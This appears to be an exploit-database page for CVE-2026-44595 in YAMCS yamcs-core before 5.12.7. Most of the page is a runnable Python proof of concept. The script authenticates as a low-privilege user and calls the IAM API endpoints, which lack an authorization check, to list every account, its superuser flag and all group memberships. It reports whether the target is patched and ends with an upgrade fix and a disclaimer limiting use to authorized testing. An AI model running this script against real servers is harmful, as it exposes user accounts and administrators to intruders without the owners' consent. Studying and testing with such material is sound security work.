Skip to main content
Home/Exploits/WebApps/YAMCS yamcs-core 5.12.7 – User Enumeration
EXPLOIT

YAMCS yamcs-core 5.12.7 – User Enumeration

CVE ID: CVE-2026-44595
Vulnerability Type: Unknown
Author: Daniel Miranda
Categories: WebApps

YAMCS yamcs-core 5.12.7 – User Enumeration

Proof of Concept (PoC)

poc.py 
# Exploit Title: YAMCS yamcs-core < 5.12.7 -  User Enumeration 
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44595
# Category: Remote / Information Disclosure
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29

#!/usr/bin/env python3
"""
CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API
=================================================================
IAM API endpoints (listUsers, getUser, listGroups, getGroup) do
not enforce SystemPrivilege.ControlAccess. Any authenticated user
can enumerate all accounts, superuser status, and group memberships.

Affected endpoints:
    GET /api/iam/users
    GET /api/iam/users/{name}
    GET /api/iam/groups
    GET /api/iam/groups/{name}
=================================================================
"""

import requests
import sys
import json

def main():
    target   = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
    username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
    password = sys.argv[3] if len(sys.argv) > 3 else "test"
    base = target.rstrip("/")

    print("=" * 65)
    print(" CVE-2026-44595 — YAMCS IAM User Enumeration PoC")
    print(f" Target:   {target}")
    print(f" Username: {username} (low-privilege account)")
    print("=" * 65)

    # Authenticate
    print(f"n[1] Authenticating as low-privilege user...")
    try:
        resp = requests.post(f"{base}/auth/token",
            data={"grant_type": "password",
                  "username": username,
                  "password": password})

        if resp.status_code != 200:
            print(f"    [-] Auth failed: HTTP {resp.status_code}")
            print(f"    [*] Create test user: yamcsadmin users create testuser --password test")
            return

        token = resp.json().get("access_token")
        print(f"    [+] Token: {token[:30]}...")
        headers = {"Authorization": f"Bearer {token}"}

    except Exception as e:
        print(f"    [-] Error: {e}")
        return

    # Enumerate users
    print(f"n[2] GET /api/iam/users (requires ControlAccess — not enforced):")
    resp = requests.get(f"{base}/api/iam/users", headers=headers)
    print(f"    HTTP: {resp.status_code}")

    if resp.status_code == 200:
        users = resp.json().get("users", [])
        print(f"n    [!!!] VULNERABLE — {len(users)} users enumerated:")
        for u in users:
            flag = "SUPERUSER" if u.get("superuser") else "regular"
            print(f"    -> {u.get('name')} [{flag}]")
    elif resp.status_code == 403:
        print(f"    [+] 403 Access Denied — PATCHED")

    # Enumerate groups
    print(f"n[3] GET /api/iam/groups:")
    resp = requests.get(f"{base}/api/iam/groups", headers=headers)
    print(f"    HTTP: {resp.status_code}")

    if resp.status_code == 200:
        groups = resp.json().get("groups", [])
        print(f"n    [!!!] VULNERABLE — {len(groups)} groups enumerated:")
        for g in groups:
            print(f"    -> {g.get('name')} ({len(g.get('members', []))} members)")
    elif resp.status_code == 403:
        print(f"    [+] 403 Access Denied — PATCHED")

    print("n" + "=" * 65)
    print(" Fix: Upgrade to yamcs-core >= 5.12.7")
    print("=" * 65)

if __name__ == "__main__":
    main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...